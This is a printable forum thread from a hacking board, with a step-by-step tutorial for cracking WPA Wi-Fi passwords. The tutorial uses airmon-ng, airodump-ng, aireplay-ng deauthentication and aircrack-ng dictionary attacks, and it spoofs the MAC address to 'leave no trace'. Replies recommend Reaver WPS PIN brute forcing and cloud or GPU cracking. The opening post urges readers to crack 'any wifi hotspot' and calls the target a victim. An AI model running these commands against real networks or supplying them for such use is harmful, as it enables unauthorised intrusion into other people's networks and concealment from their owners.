Hacking WPA Wifi Password - Printable Version

Hacking WPA Wifi Password - Printable Version

+- Sinisterly (https://sinister.ly)
+-- Forum: Hacking (https://sinister.ly/Forum-Hacking)
+--- Forum: Network Hacking (https://sinister.ly/Forum-Network-Hacking)
+--- Thread: Hacking WPA Wifi Password (/Thread-Hacking-WPA-Wifi-Password)

Pages: 1 2 3 4

Hacking WPA Wifi Password - friendlyGh0st - 03-09-2013

Guys Here is a quick tutorial of cracking any wireless network. I tried to make it user friendly. If you think it's a lil complex to understand, goto the link mentioned at the bottom for Pictorial Tut.

Requirement:
A PC installed with Linux Backtrack 5 RC2
Working Wireless LAN Card Installed (Important Part)
Huge Updated Dictionary File with password (Google It)
Goto any wifi hotspot, and crack it.. Wink

Let's start

Step 1:
Run this command to check available Wlan adapters.
airmon-ng
It should give you output something. Means it'll show us wlan networks.

Now we know that we have only one wireless interface wlan0.

Step 2:
Now lets try to start the airmon service on the interface that we have just found in Step 1. Run the give command

Code:
airmon-ng start wlan0

Ignore the errors mentioned above in my case it did not create any trouble for me but you might want to kill the conflicting services if results are different then mine. By second step we have started the service/monitor on WLAN0 now we should have additional monitoring interface on the system. You can check if a new interface mon0 is added on your system or not by using command ifconfig else try the step 3

Step 3:
You should see another monitoring interface mon0 on your system by using command ifconfig or you can the same command we did on Step 1

Here we can see the new monitoring interface mon0

Step 4:
A good hacker is always suppose to leave no trace back of his break-in.If you run the command ifconfig and notice you will find that the monitoring interface mon0 and Wireless interface Wlan0 are sharing the same MAC address. In actual mon0 is sharing the same mac address as Wlan0. check the pic below

Now we have to put a fake mac address on the monitoring interface to leave no trace.Lets make the mon0 interface down by running the command
ifconfig mon0 down
Next lets change the MAC address of mon0 interface by running the below command

Code:
macchanger –m 00:11:22:33:44:55 mon0

The output actually shows the old and new Fake mac address.Now since we have changed the MAC address on MON0 lets bring the interface back up again using the below command

Code:
ifconfig mon0 up

Now just to be sure lets run the same command ‘ifconfig’ that we have already used earlier above in Step 4

Code:
ifconfig

Here we can see we have sucessfully changed the MAC address for our monitoring interface mon0

Step 5:
Lets start du*ping the available wireless information. run the below command

Code:
airodu*p-ng mon0

Note: Replace "*" with "m" in the code wherever you see, this is altered to make the post safe, otherwise it'll be a spam.
Here my Victim router ESSID is AndroidHotSpot. The information that I need from here is
BSSID MAC details: D0:C1: B1:5B:AC:33
CHANNEL: 6

Step 6:
By now we have identified our victim its time to further narrow down this network. We need to know how many workstation/terminal connected to this wireless. Run this command with your network information that you obtained in Step 5:

Code:
airodu*p-ng –c 6 –w crackwpa –bssid 02:1A:11:FE:A4:CE

Here I can see that one client having mac address highlighed in green is connected to this hotspot. To find the password either you need to be patient to wait another client connect to this hotspot but time is money lets force this client to reconnect and make the handshake auth with the server so that we can take the packets
Note: Keep this ssh session close and open another terminal for Step 7. Do not close the existing session

Step 7:
Lets force the already connected session to make a auth handshake again
Run the given below command in the new terminal session

Code:
aireplay-ng –0 –4 –a  MAC-ADDR-OF-ROUTER –c MAC-ADDR-OF-CLIENT mon0

Final Step:
Now finally we have all the dumbed saved in the working directory we just need to crack the packet capture using dictionary file. Run the below command

Code:
aircrack-ng crackwpa-01.cap –w list

** crackwpa-01.cap is the filename of the capture packet
** list if the my dictionary file name

That's all... Finally you'll have key of the Network.. Smile

Source: http://www.learn-ethical-hacking.com/2013/03/hacking-wpa-wifi-password-in-backtrack.html

RE: Hacking WPA Wifi Password - 4t0m0 - 03-09-2013

Do you really think can crack some password like this ~|@#156#3t3nrn3t??.....?
with a dictionary it is imposible
I know there is some router with default password and there is some Android program
to get default password,but is the user change i think gonne be strong to get it
WPA/WPA2 it is a hor work

RE: Hacking WPA Wifi Password - zomgwtfbbq - 03-09-2013

(03-09-2013, 07:49 PM)4t0m0 Wrote: Do you really think can crack some password like this ~|@#156#3t3nrn3t??.....?
with a dictionary it is imposible
I know there is some router with default password and there is some Android program
to get default password,but is the user change i think gonne be strong to get it
WPA/WPA2 it is a hor work

There are a variety of that kind of routers, Thomson/Speedtouch and another one that I forgot. Biggrin

The program you describe just bruteforces the default key by guessing the manufacture date and then uses an algorithm to check whether it matches the hex BSSID value.

I made a port of the original script that can be found in the thc hacksuite which you can download from the cms site in my signature.

RE: Hacking WPA Wifi Password - chmod - 03-09-2013

Which is why you use reaver almost all routers are using WPS now days so why brute force a possibly long and complicated password when you can can brute force a simple numeric pin, get that and the router will happily dump the plain text password brute forcing WPA passwords should only be used as a last resort and intelligent setting of the rules can also speed up the process

RE: Hacking WPA Wifi Password - 4t0m0 - 03-10-2013

Yes the only way at moment is founting some router with wps activate with walsh and later try with reaver making pins.
This is the life my friends,i wait some day will eassy as WEP.

RE: Hacking WPA Wifi Password - no47 - 04-17-2013

yea! reaver is better Smile

RE: Hacking WPA Wifi Password - moroaddict - 04-22-2013

that's nice tut and thanks for your time,but i don't think so anyone is going to bruteforce wpa anymore...simply it can take a lot of YEARS to maybe crack the password..reaver rules also there is a program to automaticaly make a dictionary and you can run it in same time with aircrack..read more about it in my tut about cracking wpa2 using bruteforce attack

RE: Hacking WPA Wifi Password - lady_godiva - 07-22-2013

if you need to crack WPA i agree that if the router has WPS active then reaver is the best solution as with an upper bound of 10 hour the PIN is likely to be recovered. Some methods at research level have been proposed but no successful implementation could actually be made.

Cracking WPA or WPA can be infeasible if a strong password is used, however consider that many users set their own weak password which can easily be cracked. Many still use the ISP assigned password that most of the times can be cracked with specific algorithms. The only reliable password are the one chosen by the user with security awarness (according to reports not so many).

Be also aware that a determined attacker can actually perform bruteforce approach trying all the possible combination. This can be achieved by renting a cloud computing system (affordable nowadays) which can highly speed up the cracking process spreading the work among different machines. Consider also CUDA-like approach that speed up the bruteforcing problem a lot